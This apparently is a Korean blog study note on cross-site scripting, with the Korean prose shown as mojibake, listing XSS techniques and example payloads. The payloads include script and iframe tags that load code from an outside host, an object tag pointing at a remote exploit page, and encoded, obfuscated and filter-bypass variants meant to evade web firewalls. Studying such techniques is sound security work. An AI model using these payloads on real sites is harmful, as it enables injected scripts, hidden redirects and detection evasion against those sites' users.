Security Study/Web

XSS ๊ณต๊ฒฉ๊ธฐ๋ฒ•

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 12. 1.
728x90
๋ฐ˜์‘ํ˜•

XSS (Cross Site Scripting) ํฌ๋กœ์Šค ์‚ฌ์ดํŠธ ์Šคํฌ๋ฆฝํŠธ์€ ์„œ๋ฒ„์˜ ์„œ๋น„์Šค๋ฅผ ๊ณต๊ฒฉํ•˜๋Š” ์ผ๋ฐ˜์ ์ธ ํ•ดํ‚น๋ฐฉ๋ฒ•์ด ์•„๋‹ˆ๋ผ ํ•ด๋‹น ์„œ๋ฒ„๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์‚ฌ์šฉ์ž๋ฅผ ๊ณต๊ฒฉํ•˜๋Š” ๊ธฐ๋ฒ•์ด๋‹ค.


1. XSS


์ผ๋ฐ˜์ ์ธ ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์€ <script>alert("XSS")</script> ์ด๋Ÿฌํ•œ ๊ตฌ๋ฌธ์„ ๋„ฃ์Œ์œผ๋กœ ์ทจ์•ฝ์ ์ด ์žˆ๋Š”์ง€ ์•Œ์•„๋ณธ๋‹ค.



ex) ํด๋ฆญ์‹œ ํƒ€์‚ฌ์ดํŠธ๋กœ ์ด๋™

<a href="http://naver.com<script src='http://pwnplay.org/test'></script>">Click</a>


2. iframe ํƒœ๊ทธ


ํƒ€์‚ฌ์ดํŠธ๋กœ ์—ฐ๊ฒฐ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•จ


ex) ์ˆจ๊ฒจ์ง„ iframe๋ฅผ ์ด์šฉํ•ด ํƒ€์‚ฌ์ดํŠธ๋กœ ์ด๋™

<iframe src=" http://pwnplay.org" width="0" height="0" frameborder="0"></iframe>


3. object ํƒœ๊ทธ


ex) ์ง€์ •ํ•œ ํŒŒ์ผ์ด ์กด์žฌํ•˜์ง€ ์•Š์„ ๋‹ค์‚ฌ์ดํŠธ๋กœ ์ด๋™ํ•˜๋„๋ก ํ•จ.

<object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://pwnplay.org/attack_chm::exploit.html></object>


4. div ๊ธฐ๋ฒ•


ex) div ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ด๋ฏธ์ง€ ๋“ฑ์„ ์‚ฝ์ž…์‹œํ‚จ๋‹ค.

<div style="position:absolute; left:200; top:90; z-index:2;">

    <img src="images/test.jpg">

</div>


5. ์ธ์ฝ”๋”ฉ ๊ธฐ๋ฒ•


ex) ๊ณต๊ฒฉํ•˜๋ ค๋Š” ๋ฌธ์ž์—ด์„ ๋‹ค๋ฅธ ํ‘œํ˜„์œผ๋กœ ์ธ์ฝ”๋”ฉํ•˜์—ฌ ๋ˆˆ์— ๋ ์ง€ ์•Š๊ฑฐ๋‚˜, IPS, ์›น๋ฐฉํ™”๋ฒฝ ๋“œ์˜ ๊ฐ์ง€ํŒจํ„ด์„ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•˜์—ฌ ์ธ์ฝ”๋”ฉํ•œ๋‹ค.


์›๋ณธ : <script>alert("test");</script>

์ธ์ฝ”๋”ฉ : <script>alert(String.fromCharCode(116, 101, 115, 116))</script>


6. Obfuscated ๊ธฐ๋ฒ•


ex) ์ธ์ฝ”๋”ฉ ๊ธฐ๋ฒ•๊ณผ ๊ฐ™์ด ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ•œ๋‹ค.

<s-ript language="javas-ript">

    e = '0x00' + '5F';

    str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";

    str = tmp = '';


    for(i=0; i<str1.length; i+=3)

    { 

        tmp = unescape(str1.slice(i,i+3));

        str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);

    }


    document.write(str); 

</script>


7. ๊ธฐํƒ€์šฐํšŒ ๋ฐฉ๋ฒ• 


;</script><script>alert("xss");</script>


<scr<script>ipt>alert("xss");</scr</script>ipt>






[์ฐธ์กฐ]http://egloos.zum.com/tiger5net/v/5055050

728x90
๋ฐ˜์‘ํ˜•

'Security Study > Web' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

string filter(php)  (0) 2016.10.05
hosting ์„ํ•˜๊ธฐ์œ„ํ•œ ๊ธฐ๋ณธ?  (0) 2015.12.13
์›น ํ•ดํ‚น ๊ธฐ๋ณธ  (0) 2015.11.24
๊ตฌ๊ธ€ ํ•ดํ‚น  (0) 2015.11.21
web 2์ผ์ฐจ  (0) 2015.10.23

๋Œ“๊ธ€